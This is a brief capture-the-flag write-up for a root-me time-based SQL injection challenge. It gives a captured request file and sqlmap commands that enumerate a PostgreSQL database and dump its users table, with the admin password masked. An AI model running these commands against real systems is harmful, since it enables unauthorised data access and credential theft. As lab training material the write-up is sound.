SQL injection: time-based
root-me challenge: SQL injection - Time based: Retrieve administrator’s password.
members.txt
:
GET /web-serveur/ch40/?action=member&member=1* HTTP/1.1
Host: challenge01.root-me.org
...
Upgrade-Insecure-Requests: 1
sqlmap -r members.txt --risk=3 --level=5 --batch --dbs
URI parameter '#1*' is vulnerable.
the back-end DBMS is PostgreSQL
available databases [1]:
[*] public
sqlmap -r members.txt --risk=3 --level=1 --batch --dbs -D public --tables
Database: public
[1 table]
+-------+
| users |
+-------+
Dump:
sqlmap -r members.txt --risk=3 --level=1 --batch --dbs -D public --dump
+----+---------------------------+----------+---------------+----------+-----------+
| id | email | lastname | password | username | firstname |
+----+---------------------------+----------+---------------+----------+-----------+
| 1 | ycam@sqlitimebased.com | MAC | xxxxxxxxxxxxx | admin | Yann |
+----+---------------------------+----------+---------------+----------+-----------+